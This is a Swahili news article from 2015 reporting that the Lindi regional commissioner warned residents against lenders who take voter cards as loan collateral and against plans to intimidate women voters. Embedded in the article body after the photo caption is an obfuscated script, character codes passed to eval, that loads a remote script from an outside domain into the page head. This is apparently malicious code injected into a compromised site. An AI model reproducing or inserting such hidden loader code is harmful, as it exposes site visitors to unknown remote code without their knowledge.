Recent Comments

Wadaiwa kutumia kadi za kura kudhamini mikopo

By Baraka Bitariho Sep 14, 2015
<p>Mkuu wa Mkoa wa Lindi Mheshimiwa Mwantumu Mahiza akisisitiza jambo wakati akiwahutubia mamia ya wana CCM na wananchi wa Lindi kwenye mkutano wa hadhara</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Mkuu wa Mkoa wa Lindi Mheshimiwa Mwantumu Mahiza akisisitiza jambo wakati akiwahutubia mamia ya wana CCM na wananchi wa Lindi kwenye mkutano wa hadhara
Mkuu wa Mkoa wa Lindi Mheshimiwa Mwantumu Mahiza akisisitiza jambo wakati akiwahutubia mamia ya wana CCM na wananchi wa Lindi kwenye mkutano wa hadhara

WAKAZI wa mkoa wa Lindi wametahadharishwa kujiepusha na matapeli wanaotumia mbinu ya kuwakopesha na kisha kuchukua kadi zao za kupigia kura kama dhamana, jambo linaloweza kuwanyima haki ya kupiga kura ifikapo Oktoba 25, mwaka huu.

Pia uongozi wa mkoa umebainika kuwepo kwa taarifa za vitisho dhidi ya wanawake wa mkoa huo siku ya uchaguzi ili wasijitokeze kupiga kura. Hayo yalisemwa na Mkuu wa Mkoa wa Lindi, Mwantumu Mahiza katika mkutano wa hadhara uliofanyika katika kata ya Mandawa, mkoani Lindi.

Alisema mkoani humo wananchi wengi wamekuwa wakirubuniwa kwa mikopo midogo na kisha kadi zao za kupigia kura kuchukuliwa kama dhamana ili wasiweze kupiga kura. “Nawaomba msikubali kutoa kadi zenu kwa ajili ya kupata mikopo, vipo vitu vingi vya kuweka dhamana ili mtu apate mkopo, kwa nini wachukue kadi zenu?

Tumeshtukia, wanataka kupunguza kura za CCM,” alisema Mahiza. Aidha Mahiza alisema Kamati yake ya Ulinzi na Usalama imepokea taarifa za kuandaliwa mikakati ya kuwatisha wananchi wa mkoa huo hasa akinamama ili wasipige kura siku ya uchaguzi.

Alisema taarifa hizo zinaonesha kuwa ipo mikakati ya kuhakikisha siku ya uchaguzi linatokea tukio litakalowatisha akinamama hadi washindwe kupiga kura. “Nawahakikishieni hapa hapigwi wala kuumizwa mtu, Mimi ndiye Mwenyekiti wa Kamati ya Ulinzi na Usalama, nendeni mkapige kura, atakayewasumbua atakiona cha mtema kuni,” alisisitiza.

Naye Assumpta Mshama aliyekuwa Mbunge wa Nkenga, alisema ni jambo la kuepuka kurubuniwa kutoa kadi za kupigia kura kwa ajili ya dhamana ya mikopo. “Ndugu zangu, usitoe kadi yako ya miaka mitano kwa ajili ya mkopo wa Sh 50,000.

Chukueni hizo hela kadi zenu kataeni kuwapa,” alisema. Aliwataka wananchi hao kutambua kuwa jambo la muhimu kwao si kiasi hicho kidogo cha fedha bali mahitaji muhimu kama vile elimu, afya na miundombinu.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com